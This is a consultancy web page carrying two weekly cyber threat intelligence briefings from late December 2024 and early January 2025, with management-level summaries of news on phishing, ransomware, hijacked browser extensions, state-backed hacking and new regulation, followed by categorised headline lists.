UK Internet Domain Registry Nominet Suffers Cyber Attack - ISPreview UK

Gayfemboy Botnet targets Four-Faith router vulnerability

Chinese APT Exploits Versa Networks Zero-Day Flaw | Decipher


Sector Specific

Industry-specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

·       Automotive

·       Construction

·       Critical National Infrastructure (CNI)

·       Defence & Space

·       Education & Academia

·       Energy & Utilities

·       Estate Agencies

·       Financial Services

·       FinTech

·       Food & Agriculture

·       Gaming & Gambling

·       Government & Public Sector (including Law Enforcement)

·       Health/Medical/Pharma

·       Hotels & Hospitality

·       Insurance

·       Legal

·       Manufacturing

·       Maritime & Shipping

·       Oil, Gas & Mining

·       OT, ICS, IIoT, SCADA & Cyber-Physical Systems

·       Retail & eCommerce

·       Small and Medium Sized Businesses (SMBs)

·       Startups

·       Telecoms

·       Third Sector & Charities

·       Transport & Aviation

·       Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness; linking to or reposting external content does not endorse any service or product, and we are not responsible for the security of external links.


Black Arrow Cyber Threat Intelligence Briefing 03 January 2025

Black Arrow Cyber Threat Intelligence Briefing 03 January 2025:

-Corporate Executives are Being Increasingly Targeted by AI Phishing Scams

-Unconventional Russian Attack Could Cause 'Substantial' Casualties, Top NATO Official Warns

-35 Chrome Extensions Began Stealing People's Data After the Developers Got Phished

-China's Cyber Intrusions Took a Sinister Turn in 2024

-Third Party Risk Management is Critical as DORA and New FCA Rules Come into Effect

-Ransomware 2024: A Year of Tricks, Traps, Wins and Losses

-The Modern CISO is a Cornerstone of Organisational Success

-Ransomware Reality Check: Are You Ready to Face Organised Cyber Crime?

-How Cops Taking Down Ransomware Gangs Led to the Meteoric Rise of Another

-Experts Unsure of Risk Appetite as EU Beefs Up Cyber Rules for Critical Infrastructure

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities, and cyber-related news from the last week.

Summary

Cyber security threats in 2024 became more sophisticated, with AI-driven phishing, ransomware, and state-sponsored attacks presenting significant challenges. This week’s threat intelligence review shows that hyper-personalised phishing campaigns now account for 90% of successful cyber attacks, costing organisations an average of $4.9m per breach. Ransomware-as-a-service (RaaS) has lowered barriers for attackers, targeting critical sectors and driving recovery costs to $3m per incident.

Geopolitical tensions have intensified risks, with NATO highlighting hybrid attacks from Russia and China’s state-backed groups targeting critical infrastructure. These incidents underscore the vulnerabilities in sectors like energy and emergency services, necessitating urgent action to enhance resilience.

Supply chain security also remains a concern, with Chrome extension compromises demonstrating the risks of inadequate oversight. New regulations such as the EU’s NIS2 directive and UK Financial Conduct Authority (FCA) rules will push businesses to improve third-party risk management and compliance in 2025.

To combat these threats, organisations must adopt a cyber security strategy that considers zero trust architectures, multi-factor authentication, and robust incident response plans. Effective training and the strategic leadership of Chief Information Security Officers (CISOs) are critical in bridging security and business objectives, ensuring resilience against an evolving cyber threat landscape. 


Top Cyber Stories of the Last Week

Corporate Executives are Being Increasingly Targeted by AI Phishing Scams

Corporate executives are increasingly targeted by sophisticated AI-driven phishing attacks, leveraging vast amounts of data to create hyper-personalised scams. Experts highlight a sharp rise in such attacks, with 90% of successful cyber attacks originating from phishing emails. These scams cost organisations significantly, with the global average cost of a data breach reaching $4.9m in 2024. Reports reveal a 28% increase in phishing attacks in Q2 2024, with some firms receiving up to 36 phishing emails daily. Businesses are urged to adopt multi-layered security measures and employee training to mitigate these escalating threats.

Unconventional Russian Attack Could Cause 'Substantial' Casualties, Top NATO Official Warns

NATO officials warn that hybrid attacks, particularly from Russia, are escalating to levels considered intolerable just five years ago, describing the situation as akin to "boiling the frog." These unconventional threats, including sabotage and cyber attacks, pose a "real prospect" of substantial casualties or significant economic harm. The rise in incidents is linked to Western support for Ukraine and Moscow's perception of NATO as an adversary. In response, NATO is updating its strategy on hybrid warfare, enhancing tracking of incidents and clarifying red lines to deter escalation, addressing ambiguities around thresholds for invoking Article 5.

35 Chrome Extensions Began Stealing People's Data After the Developers Got Phished

Recent reports have highlighted the risks associated with compromised Chrome extensions after a phishing campaign targeted developers. Attackers used fake Google warnings to trick developers into sharing login credentials, allowing them to introduce malicious updates to 35 extensions. These updates harvested data from users. Notably, even two-factor authentication was bypassed during the attacks, exposing vulnerabilities in the security process. Organisations are advised to review their use of Chrome extensions against published threat lists and ensure robust security awareness for staff managing digital assets to mitigate risks of similar incidents.

China's Cyber Intrusions Took a Sinister Turn in 2024

In 2024, Chinese state-backed cyber attacks took a concerning turn, moving from traditional espionage to pre-positioning for potential disruptive operations targeting critical infrastructure. Groups like Volt Typhoon have infiltrated US networks, including emergency services and the electric grid, using stealth techniques to avoid detection. Despite efforts to dismantle botnets, attackers maintain access to compromised systems, leveraging legitimate tools for reconnaissance and persistence. Experts warn that these activities highlight gaps in critical infrastructure security, with many organisations unaware of vulnerabilities. US agencies urge urgent action, including patching systems, upgrading outdated equipment, and adopting multi-factor authentication, to mitigate future threats.

Third Party Risk Management is Critical as DORA and New FCA Rules Come into Effect

New rules coming into effect in 2025 will require IT firms deemed “critical” to the UK financial sector to enhance transparency around cyber attacks and resilience measures. Overseen by the Financial Conduct Authority, the Bank of England and the Prudential Regulation Authority, the measures aim to ensure the sector remains resilient against threats like cyber attacks and natural disasters. While industry experts broadly welcome the focus on third-party risk management, questions remain about supplier classification and data-sharing processes. Firms will also need to conduct resilience testing, potentially collaborating with financial institutions to ensure robust protection of financial market infrastructures.

Ransomware 2024: A Year of Tricks, Traps, Wins and Losses

Ransomware attacks in 2024 reached unprecedented levels, targeting critical sectors like healthcare, public infrastructure, and the cloud. The rise of ransomware-as-a-service (RaaS) enabled less experienced attackers to launch devastating campaigns, while nation-state actors leveraged ransomware for geopolitical gains. High-profile incidents exposed vulnerabilities in healthcare, disrupted infrastructure, and fuelled economic warfare. Recovery costs soared to an average of $3 million per attack, reflecting attackers’ increasing sophistication. Generative AI played a dual role, enhancing both defences and threats. These developments underscore ransomware’s evolution into a strategic and economic weapon, demanding heightened resilience, zero-trust adoption, and global collaboration in 2025 and beyond.

The Modern CISO is a Cornerstone of Organisational Success

The role of the Chief Information Security Officer (CISO), whether internal or outsourced, has evolved from a technical focus to being integral to business strategy, bridging cyber security with operational and strategic objectives. Modern CISOs align security initiatives with business goals, enhance customer trust, and ensure compliance with complex regulatory frameworks. Key responsibilities include embedding security into operations without disrupting productivity, managing risks such as legacy systems and resource constraints, and implementing measures like zero trust architecture. As businesses face emerging threats, the CISO’s strategic leadership is increasingly vital to fostering resilience and securing competitive advantage.

Ransomware Reality Check: Are You Ready to Face Organised Cyber Crime?

Ransomware attacks remain a pressing concern, with professional criminal enterprises leveraging advanced extortion tactics that target data confidentiality rather than just availability. The shift from data encryption to exfiltration has increased ransom demands and heightened reputational risks for organisations. Many companies lack clear ransomware-specific policies, leaving leadership to make critical decisions under pressure during incidents. Preparation is vital; pre-defined payment stances, established incident response retainers, and proactive resilience measures are essential. Ransomware is not just a technical issue but a moral and business challenge, requiring C-suite collaboration to mitigate risks and avoid financing organised crime.

How Cops Taking Down Ransomware Gangs Led to the Meteoric Rise of Another

RansomHub has emerged as a dominant ransomware group in 2024, accounting for approximately 20% of all ransomware and data exfiltration incidents in Q4. The group capitalised on the law enforcement takedowns of their competitors LockBit and ALPHV, recruiting affiliates with a highly lucrative 90-10 revenue split. Their aggressive tactics and rapid rise have attracted significant attention, with over 210 victims targeted within six months, including major organisations across various sectors. While their methods are not unique, their speed and affiliate-centric model position them as a critical threat in early 2025, with law enforcement and security firms closely monitoring their activity.

Experts Unsure of Risk Appetite as EU Beefs Up Cyber Rules for Critical Infrastructure

The EU’s NIS2 directive places a renewed focus on cyber security for critical infrastructure and essential services, including energy, transport, and banking. Executives are directly accountable for compliance, with the directive requiring robust risk management, incident reporting, and scrutiny of suppliers’ security measures. Concerns remain over inconsistent enforcement across member states, which could complicate implementation. Experts predict that NIS2 will set a global benchmark for managing cyber risks, similar to the influence of GDPR on data privacy. Business leaders should prepare for increased scrutiny, especially as the directive's scope may encompass more organisations than initially expected.

Sources:

https://www.techradar.com/pro/security/corporate-executives-are-being-increasingly-targeted-by-ai-phishing-scams

https://news.sky.com/story/unconventional-russian-attack-could-cause-substantial-casualties-top-nato-official-warns-13281003

https://www.xda-developers.com/35-chrome-extensions-stealing-peoples-data/

https://www.theregister.com/2024/12/31/china_cyber_intrusions_2024/

https://www.complianceweek.com/regulatory-policy/tprm-critical-as-dora-new-fca-third-party-engagement-rules-come-into-effect-in-2025/35759.article

https://www.scworld.com/feature/ransomware-2024-a-year-of-tricks-traps-wins-and-losses

https://www.helpnetsecurity.com/2025/01/03/tomorrow-ciso-role-transformation/

https://insight.scmagazineuk.com/ransomware-reality-check-are-you-ready-to-face-organised-cybercrime

https://www.theregister.com/2024/12/28/lockbit_alphv_disruptions_ransomhub_rise/

https://www.complianceweek.com/regulatory-policy/experts-unsure-of-risk-appetite-as-eu-beefs-up-cyber-rules-for-critical-infrastructure/35760.article

Threats

Ransomware, Extortion and Destructive Attacks

Ransomware Reality Check: Are You Ready To Face Organised Cyber Crime? | SC Media UK

Record-breaking ransoms and breaches: A timeline of ransomware in 2024 | TechCrunch

How LockBit and ALPHV’s takedowns fuelled RansomHub’s rise • The Register

Clop ransomware lists Cleo cyber attack victims | TechRadar

Top 10 Most Active Ransomware Groups of 2024 - Infosecurity Magazine

What 2024’s Worst Cyber Attacks Show About Staying Safe in 2025

Ransomware 2024: A year of tricks, traps, wins and losses | SC Media

Ransomware downtime costs US healthcare organisations $1.9M daily | Healthcare IT News

US Army Soldier Arrested in AT&T, Verizon Extortions – Krebs on Security

Ransomware Victims

Clop ransomware lists Cleo cyber attack victims | TechRadar

Hackers Leak Rhode Island Citizens' Data on Dark Web - Infosecurity Magazine

Atos confirms not being compromised by the ransomware group

Thomas Cook Hit by Cyber Attack, IT Systems Impacted

Phishing & Email Based Attacks

Corporate executives are being increasingly targeted by AI phishing scams | TechRadar

Look out for hyper-personalized phishing attacks, powered by AI

New details reveal how hackers hijacked 35 Google Chrome extensions

These 35 Chrome extensions began stealing people's data after the developers got phished

Phishing Attack Allowed Malicious Chrome Extension to be Published | SC Media UK

Google Chrome extensions hack may have started much earlier than expected | TechRadar

Top 12 ways hackers broke into your systems in 2024 | CSO Online

Other Social Engineering

Cyberhaven Chrome Extension Hack Linked to Widening Supply Chain Campaign - SecurityWeek

OAuth Identity Attack — Are your Extensions Affected? - Security Boulevard

Cyber startup employee hacked to distribute malicious Chrome extension | The Record from Recorded Future News

Cyber security firm's Chrome extension hijacked to steal users' data

When Good Extensions Go Bad: Takeaways from the Campaign Targeting Browser Extensions

16 Chrome Extensions Hacked, Exposing Over 600,000 Users to Data Theft

Artificial Intelligence

Corporate executives are being increasingly targeted by AI phishing scams | TechRadar

Look out for hyper-personalized phishing attacks, powered by AI

AI agents may lead the next wave of cyber attacks - SiliconANGLE

LLMs could soon supercharge supply-chain attacks • The Register

'Bad Likert Judge' Jailbreaks OpenAI Defences

How will rules and regulations affect cyber security and AI in 2025? | SC Media

Deepfakes question our ability to discern reality - Help Net Security

Navigate the 2025 threat landscape with expert insights | TechTarget

2025: The Dawn of AI-Driven Cyber Crime

2FA/MFA

Google Chrome 2FA Bypass Attacks Confirmed—Millions Of Users At Risk

Malware

Experts warn of a surge in activity associated FICORA and Kaiten botnets

D-Link Botnet Attacks Surge in Global Spike - DataBreachToday

Over 600,000 Chrome users at risk after 16 browser extensions compromised by hackers — what you need to know | Tom's Guide

Malware botnets exploit outdated D-Link routers in recent attacks

Global Campaign Targets PlugX Malware with Innovative Portal - Infosecurity Magazine

Bots/Botnets

Experts warn of a surge in activity associated FICORA and Kaiten botnets

D-Link Botnet Attacks Surge in Global Spike - DataBreachToday

Malware botnets exploit outdated D-Link routers in recent attacks

Mobile

Wiping your Android phone? Here's the easiest way to erase all personal data | ZDNET

Critical Gmail Warning—Don’t Click Yes To These Google Security Alerts

Here's how to use the feature that protects your iPhone in case of a major cyber attack - PhoneArena

Denial of Service/DoS/DDoS

NTT Docomo hit by DDoS attack | Total Telecom

Internet of Things – IoT

Experts warn of a surge in activity associated FICORA and Kaiten botnets

D-Link Botnet Attacks Surge in Global Spike - DataBreachToday

Data Breaches/Leaks

Every minute, 4,080 records are compromised in data breaches - Help Net Security

Human error to blame in Ascension data breach that impacted 5.6 million patients | TechSpot

Massive VW Data Leak Exposed 800,000 EV Owners’ Movements, From Homes To Private Spaces | Carscoops

How Breach Readiness Will Shape Cyber Defence in 2025 - Security Boulevard

Machine gun, pistol and hundreds of devices lost by Ministry of Defence | UK News | Sky News

Cisco Confirms Authenticity of Data After Second Leak - SecurityWeek

Hackers Leak Rhode Island Citizens' Data on Dark Web - Infosecurity Magazine

ZAGG disclosed a data breach that exposed its customers' credit card data

Rhode Islanders’ Data Was Leaked From a Cyber Attack on State Health Benefits Website - SecurityWeek

Organised Crime & Criminal Actors

Cyber criminals tighten their grip on organisations - Help Net Security

Ransomware Reality Check: Are You Ready To Face Organised Cyber Crime? | SC Media UK

US Arrests Army Soldier Over AT&T, Verizon Hacking - SecurityWeek

2024: A jackpot year for North Korea's cyber criminals - Daily NK English

Insider Risk and Insider Threats

Human error to blame in Ascension data breach that impacted 5.6 million patients | TechSpot

Things not to store on your work laptop

Navigate the 2025 threat landscape with expert insights | TechTarget

US Army Soldier Arrested in AT&T, Verizon Extortions – Krebs on Security

Insurance

How to Get the Most Out of Cyber Insurance

Supply Chain and Third Parties

Cyberhaven Chrome Extension Hack Linked to Widening Supply Chain Campaign - SecurityWeek

OAuth Identity Attack — Are your Extensions Affected? - Security Boulevard

New details reveal how hackers hijacked 35 Google Chrome extensions

Google Chrome extensions hack may have started much earlier than expected | TechRadar

Over 600,000 Chrome users at risk after 16 browser extensions compromised by hackers — what you need to know | Tom's Guide

When Good Extensions Go Bad: Takeaways from the Campaign Targeting Browser Extensions

Chinese APT Exploits BeyondTrust API Key to Access U.S. Treasury Systems and Documents

China-linked hackers target US Treasury through compromised software provider in cyber attack | Invezz

TPRM critical as DORA, new FCA third-party engagement rules come into effect in 2025 | Premium | Compliance Week

LLMs could soon supercharge supply-chain attacks • The Register

Cloud/SaaS

Managing Cloud Risks Gave Security Teams a Big Headache in 2024

Misconfigured Kubernetes RBAC in Azure Airflow Could Expose Entire Cluster to Exploitation

Azure compromise possible with Apache Airflow vulnerabilities | SC Media

Stay Ahead: Integrating IAM with Your Cloud Strategy - Security Boulevard

Identity and Access Management

Machine identities are the next big target for attackers - Help Net Security

Misconfigured Kubernetes RBAC in Azure Airflow Could Expose Entire Cluster to Exploitation

Encryption

Quantum Computing Advances in 2024 Put Security In Spotlight

Will quantum computing break encryption as we know it?

Over 3 million mail servers without encryption exposed to sniffing attacks

The CISO’s guide to accelerating quantum-safe readiness

Hacker demonstrates the supposedly-patched Windows 11 BitLocker is still vulnerable to hackers — default encryption can be overcome with network access | Tom's Hardware

Passwords, Credential Stuffing & Brute Force Attacks

Passkeys were supposed to be secure and simple; here's how they fail

Regulations, Fines and Legislation

Experts unsure of risk appetite as EU beefs up cyber rules for critical infrastructure | Premium | Compliance Week

City regulators to start oversight of tech firms that provide ‘critical’ services to UK | Financial sector | The Guardian

New HIPAA Rules Mandate 72-Hour Data Restoration and Annual Compliance Audits

Top 10 Data Protection Fines and Settlements of 2024 - Infosecurity Magazine

How will rules and regulations affect cyber security and AI in 2025? | SC Media

Cyber security laws: Companies grapple with costs, complexity of overlapping cyber security laws - The Economic Times

2025: A Critical Year for Cyber Security Compliance in the EU and UK - Infosecurity Magazine

TPRM critical as DORA, new FCA third-party engagement rules come into effect in 2025 | Premium | Compliance Week

UN cyber crime treaty adopted amid pushback | SC Media

US proposes cyber security rules to limit impact of health data leaks

HIPAA to be updated with cyber security regulations, White House says | The Record from Recorded Future News

Navigating the SEC’s Cyber Security Disclosure Rules: One Year On - Security Boulevard

US prohibits data sales to adversarial nations | SC Media

Apple to Pay $95 Million to Settle Lawsuit Accusing Siri of Snoopy Eavesdropping - SecurityWeek

Court strikes down US net neutrality rules - BBC News

Models, Frameworks and Standards

TPRM critical as DORA, new FCA third-party engagement rules come into effect in 2025 | Premium | Compliance Week

City regulators to start oversight of tech firms that provide ‘critical’ services to UK | Financial sector | The Guardian

The 5 most impactful cyber security guidelines (and 3 that fell flat)

New HIPAA Rules Mandate 72-Hour Data Restoration and Annual Compliance Audits

Data Protection

Top 10 Data Protection Fines and Settlements of 2024 - Infosecurity Magazine

US prohibits data sales to adversarial nations | SC Media

Careers, Working in Cyber and Information Security

The state of cyber security and IT talent shortages - Help Net Security

Law Enforcement Action and Take Downs

Three Russian-German Nationals Charged with Espionage for Russian Secret Service

US Army Soldier Arrested in AT&T, Verizon Extortions – Krebs on Security


Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

US prohibits data sales to adversarial nations | SC Media

Nation State Actors

China

China's cyber intrusions turns sinister in 2024 • The Register

What to know about string of US hacks blamed on China - BBC News

Chinese Hackers Reportedly Targeted US Sanctions Office

2024 Espionage Review: How China, Russia, North Korea, Iran, and Ethiopia Targeted U.S. Security - ClearanceJobs

Nato to boost Baltic Sea presence after suspected sabotage of underwater cable | Nato | The Guardian

Finland police seize ship after undersea power cable to Estonia is cut - The Washington Post

Ninth telecoms firm has been hit by a massive Chinese espionage campaign, the White House says - Washington Times

Finland finds drag marks on Baltic seabed after cable damage | Reuters

Palo Alto Firewalls Backdoored by Suspected Chinese Hackers

White House: Salt Typhoon hacks possible because telecoms lacked basic security measures | CyberScoop

US Treasury hacked: Are China and the US stepping up their cyberwar? | Cyber Crime News | Al Jazeera

AT&T and Verizon say networks secure after Salt Typhoon breach

The US plans a full tech embargo on China, Russia, and Iran, and NVIDIA may pay the price - Jason Deegan

China-linked hackers target US Treasury through compromised software provider in cyber attack | Invezz

Lumen reports that it has locked out the Salt Typhoon group from its network

Germany Says Latest Undersea Cable Cut a ‘Wake-up Call' - The Moscow Times

Estonia navy to protect undersea power link after main cable damaged - BBC News

Finland moves tanker suspected of undersea cable damage closer to port | Reuters

Russia

Russia could inflict 'substantial' casualties by unconventional attack against NATO, allied official says

Unconventional Russian attack could cause 'substantial' casualties, top NATO official warns | World News | Sky News

2024 Espionage Review: How China, Russia, North Korea, Iran, and Ethiopia Targeted U.S. Security - ClearanceJobs

Nato to boost Baltic Sea presence after suspected sabotage of underwater cable | Nato | The Guardian

Finland police seize ship after undersea power cable to Estonia is cut - The Washington Post

Finland finds drag marks on Baltic seabed after cable damage | Reuters

Ukraine recovers key notarial registers affected by Russian cyber attack | Ukrainska Pravda

Ukraine Cyber Support Funding Tops €200 million | SC Media UK

US sanctions Russian, Iranian groups for election interference | CyberScoop

Germany Says Latest Undersea Cable Cut a ‘Wake-up Call' - The Moscow Times

Three Russian-German Nationals Charged with Espionage for Russian Secret Service

Luxury Western Goods Line Russian Stores, Three Years Into Sanctions

Pro-Russian hackers target Italian airport websites – DW – 12/28/2024

Cyber attack on Italy's Foreign Ministry, airports claimed by pro-Russian hacker group | Reuters

The US plans a full tech embargo on China, Russia, and Iran, and NVIDIA may pay the price - Jason Deegan

Russian media outlets Telegram channels blocked in European countries

Estonia navy to protect undersea power link after main cable damaged - BBC News

Finland moves tanker suspected of undersea cable damage closer to port | Reuters

Russian smugglers import luxury cars from Europe despite sanctions

Iran

2024 Espionage Review: How China, Russia, North Korea, Iran, and Ethiopia Targeted U.S. Security - ClearanceJobs

US sanctions Russian, Iranian groups for election interference | CyberScoop

The US plans a full tech embargo on China, Russia, and Iran, and NVIDIA may pay the price - Jason Deegan

North Korea

2024 Espionage Review: How China, Russia, North Korea, Iran, and Ethiopia Targeted U.S. Security - ClearanceJobs

2024: A jackpot year for North Korea's cyber criminals - Daily NK English

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

2024 Espionage Review: How China, Russia, North Korea, Iran, and Ethiopia Targeted U.S. Security - ClearanceJobs





Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

·       Automotive

·       Construction

·       Critical National Infrastructure (CNI)

·       Defence & Space

·       Education & Academia

·       Energy & Utilities

·       Estate Agencies

·       Financial Services

·       FinTech

·       Food & Agriculture

·       Gaming & Gambling

·       Government & Public Sector (including Law Enforcement)

·       Health/Medical/Pharma

·       Hotels & Hospitality

·       Insurance

·       Legal

·       Manufacturing

·       Maritime & Shipping

·       Oil, Gas & Mining

·       OT, ICS, IIoT, SCADA & Cyber-Physical Systems

·       Retail & eCommerce

·       Small and Medium Sized Businesses (SMBs)

·       Startups

·       Telecoms

·       Third Sector & Charities

·       Transport & Aviation

·       Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.

Black Arrow Admin

Black Arrow Cyber Threat Intelligence Briefing 27 December 2024

Black Arrow Cyber Threat Intelligence Briefing 27 December 2024:

-Hackers are Using Russian Domains to Launch Complex Document-Based Phishing Attacks

-How Nation-State Cyber Criminals Are Targeting the Enterprise

-Phishing Report Findings Call for a Fundamental Shift in Organisational Approaches to Defence

-Organisations Need to Get Real About Threat of Cyber Attacks

-Dark Web Cyber Criminals are Buying Up IDs to Bypass KYC Methods

-Cl0p Ransomware Group to Name Over 60 Victims of Cleo Attack

-Service Disruptions Continue to Blindside Businesses

-Infostealers Dominate as Lumma Stealer Detections Soar by Almost 400%

-Ransomware Attackers Target Industries with Low Downtime Tolerance

-North Koreans Stole $1.34bn In Crypto This Year

-Beware Of Shadow AI: Shadow IT’s Less Well-Known Brother

-Working with Security Consultants Will Bolster Cyber Resilience as We Enter 2025

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities, and cyber-related news from the last week.

Top Cyber Stories of the Last Week

Hackers are Using Russian Domains to Launch Complex Document-Based Phishing Attacks

New research reveals a sharp increase in malicious emails, bypassing secure gateways every 45 seconds. Remote Access Trojans rose by 59%, while open redirects soared by 627%. Phishing attacks are shifting to Microsoft Office documents, surging by nearly 600% in malicious use, and Russian domains, used four to twelve times more, are now being used for data exfiltration. Attackers harness widely used services like TikTok and Google AMP to redirect unsuspecting users to harmful links. This surge in threats highlights the urgent need for stronger cyber security measures to protect organisations’ networks and data.

How Nation-State Cyber Criminals are Targeting the Enterprise

Nation-state threat actors, once focused on critical infrastructure, are now targeting enterprises across industries as geopolitical tensions escalate. In the past year, these advanced groups have increased attacks on organisations handling sensitive data, aiming to exfiltrate intellectual property and disrupt operations. Unlike traditional ransomware gangs, they have significant resources, persistence, and clear missions such as espionage or undermining rivals. This complex threat environment underscores the need for robust cyber security measures, from strengthening incident response planning and network visibility, to fostering partnerships with government and industry peers. Effective defence requires ongoing vigilance and collaboration to safeguard critical assets.

Phishing Report Findings Call for a Fundamental Shift in Organisational Approaches to Defence

SlashNext’s 2024 Phishing Intelligence Report reveals a significant escalation in phishing threats, urging organisations to rethink their defence strategies. Credential phishing attacks surged by 703%, while email-based threats rose by 202%, exposing users to up to 600 mobile threats annually. 80% of embedded malicious links were zero-day threats (for which there was no remedy at the time) and bypassed traditional detection methods. Social engineering attacks increased by 141%, targeting users across platforms like Microsoft Teams and Dropbox. Experts emphasise the need for proactive, adaptive security strategies, advanced identity verification, and machine learning to counter evolving threats and safeguard critical assets in a rapidly expanding threat landscape.

Organisations Need to Get Real About Threat of Cyber Attacks

The UK’s National Cyber Security Centre’s eighth annual review warns that the threat from state-led and criminal cyber attacks is greater than many organisations realise. The impact is already huge, with attacks costing businesses $2 trillion last year. Experts say technology is only part of the solution, calling for stronger human defences, “digital trust” and realistic scenario planning. By running regular incident response exercises and improving user awareness, leaders can better prepare for and respond to breaches, maintaining trust and protecting their operations.

Black Arrow works with organisations of all sizes and sectors to design and prepare for managing a cyber security incident; this can include an Incident Response Plan and an educational tabletop exercise for the leadership team that highlights the proportionate controls to help the organisation prevent and mitigate an incident.

Dark Web Cyber Criminals are Buying Up IDs to Bypass KYC Methods

A new report by iProov reveals a sophisticated dark web operation collecting genuine identity documents and biometric data, often purchased directly from individuals, to bypass Know Your Customer (KYC) processes. The operation spans Latin America and Eastern Europe, posing a significant risk to organisations relying on traditional identity verification systems. iProov warns that these complete identity packages, combining real documents with matching biometrics, are exceptionally challenging to detect. To counteract these threats, firms must adopt a multi-layered, real-time verification approach to confirm both humanity and identity, significantly enhancing defences against advanced impersonation fraud.

Cl0p Ransomware Group to Name Over 60 Victims of Cleo Attack

The Cl0p ransomware group has exploited vulnerabilities in Cleo’s file transfer products, affecting over 60 organisations, with victims being contacted and provided proof of stolen data. Blue Yonder, a supply chain software provider, is the only named victim so far, though more are expected to be publicly identified unless ransoms are paid. The vulnerabilities, exploited since early December, allowed attackers to steal files without authentication, and Cleo’s tools are used by over 4,000 customers. Cl0p’s actions mirror its previous MOVEit campaign, further highlighting the persistent risks of unpatched file transfer systems.

Service Disruptions Continue to Blindside Businesses

PagerDuty's latest report highlights service disruptions as a pressing concern for businesses, with 88% of executives predicting another major incident within a year. The July global IT outage exposed gaps in preparedness, with 83% of executives caught off guard, resulting in lost revenue (37%) and delayed responses (39%). Nearly half of UK, US, and Australian leaders, along with a majority in Japan, cite insufficient real-time data tools as a hindrance. As 86% admit to prioritising efforts to build security rather than being ready to react if the security is breached, the report emphasises the need for proactive planning to mitigate the financial and reputational impacts of future disruptions.

Infostealers Dominate as Lumma Stealer Detections Soar by Almost 400%

An infostealer is a type of malicious software designed to secretly gather private information, such as passwords, financial details, or other sensitive data, from an infected device. Once it collects this data, it sends it to the attacker, who can then misuse it for financial gain, identity theft, or other illegal activities. Cyber security software provider ESET has found a 369% increase in detections of the Lumma Stealer infostealer, now dominating attacks by targeting 2FA browser extensions, user credentials and cryptocurrency wallets. Organisations should consider the threat of infostealers and other malicious software as part of a cohesive cyber security strategy.

Ransomware Attackers Target Industries with Low Downtime Tolerance

Cyber security provider Dragos found that 23 ransomware groups, including newly emerged or rebranded operators, impacted industrial organisations in Q3 2024. They targeted sectors with low downtime tolerance, such as healthcare and finance, resulting in significant operational halts, financial losses, and data compromises. One major automotive software firm paid a $25m ransom, while an oilfield services provider lost $35m. Attackers have evolved to bypass multi-factor authentication and exploit VPN weaknesses, with living-off-the-land and remote access tools enabling stealthy intrusions. They also increasingly rely on initial access brokers, using advanced malware to persist in virtual environments and critical operations.

North Koreans Stole $1.34bn In Crypto This Year

Hackers linked to North Korea have reportedly stolen $1.34bn in cryptocurrency so far this year, accounting for over half of all such thefts. This surge highlights a reliance on illicit digital funds to finance ballistic missile and nuclear programmes, with the US estimating a third of North Korea’s missile development is funded by hacking. Attacks slowed after a reported strategic partnership with Russia in June which may have reduced North Korea’s dependency on cyber crime, although overall crypto-based hacking has risen. Despite total stolen amounts being lower than in previous years, the number of breaches is at a record 303, indicating an ongoing need for robust cyber security measures.

Beware Of Shadow AI: Shadow IT’s Less Well-Known Brother

Research indicates that 50–75% of employees use non-company AI tools, raising concerns around data leakage, compliance, and vulnerabilities to cyber attack. The number of these applications continues to surge, yet only 15% of organisations have a formal AI policy in place. This lack of oversight can lead to reputational and legal damage. While AI promises innovation and productivity gains, leaders must address Shadow AI by establishing robust governance, enforcing granular controls, and conducting frequent security audits. Boards should ensure their cyber security strategy helps mitigate these risks while unlocking AI’s benefits.

Working with Security Consultants Will Bolster Cyber Resilience as We Enter 2025

With a shortage of talent, new regulations on the horizon, and an evolving threat landscape, cyber resilience is becoming a top priority for organisations. The upcoming UK Cyber Security and Resilience Bill and stringent frameworks for financial institutions highlight the urgent need for robust defences. Despite this focus on cyber security, many organisations face recruitment hurdles due to an undersupplied talent pool. As a result, hiring external cyber security specialists is emerging as a cost-effective solution, giving businesses access to the necessary skills without the lengthy recruitment process. This approach helps close the talent gap while strengthening defences into 2025 and beyond.

Sources:

https://www.techradar.com/pro/Hackers-are-using-Russian-domains-to-launch-complex-document-based-phishing-attacks

https://www.darkreading.com/vulnerabilities-threats/how-nation-state-cybercriminals-target-enterprise

https://informationsecuritybuzz.com/phishing-report-findings-fundamental/

https://www.forbes.com/sites/rogertrapp/2024/12/22/organizations-need-to-get-real-about-threat-of-cyber-attacks/

https://www.techradar.com/pro/security/dark-web-cybercriminals-are-buying-up-id-to-bypass-kyc-methods

https://www.securityweek.com/cl0p-ransomware-group-to-name-over-60-victims-of-cleo-attack/

https://www.helpnetsecurity.com/2024/12/26/service-disruptions-concern/

https://www.infosecurity-magazine.com/news/infostealers-lumma-stealer/

https://www.infosecurity-magazine.com/news/ransomware-industries-downtime/

https://www.silicon.co.uk/security/cyberwar/north-korea-hacking-593725

https://www.securityweek.com/beware-of-shadow-ai-shadow-its-less-well-known-brother/

https://www.scotsman.com/business/working-with-security-consultants-will-bolster-cyber-resilience-as-we-enter-2025-4907662



Threats

Ransomware, Extortion and Destructive Attacks

Ransomware Attackers Target Industries with Low Downtime Tolerance - Infosecurity Magazine

Small Business Cyber Security Statistics

Half of UK businesses hit by cyber breaches in 2024 - Digital Journal

Clop ransomware is now extorting 66 Cleo data-theft victims

LockBit Admins Tease a New Ransomware Version - Infosecurity Magazine

LockBit Developer Rostislav Panev Charged for Billions in Global Ransomware Damages

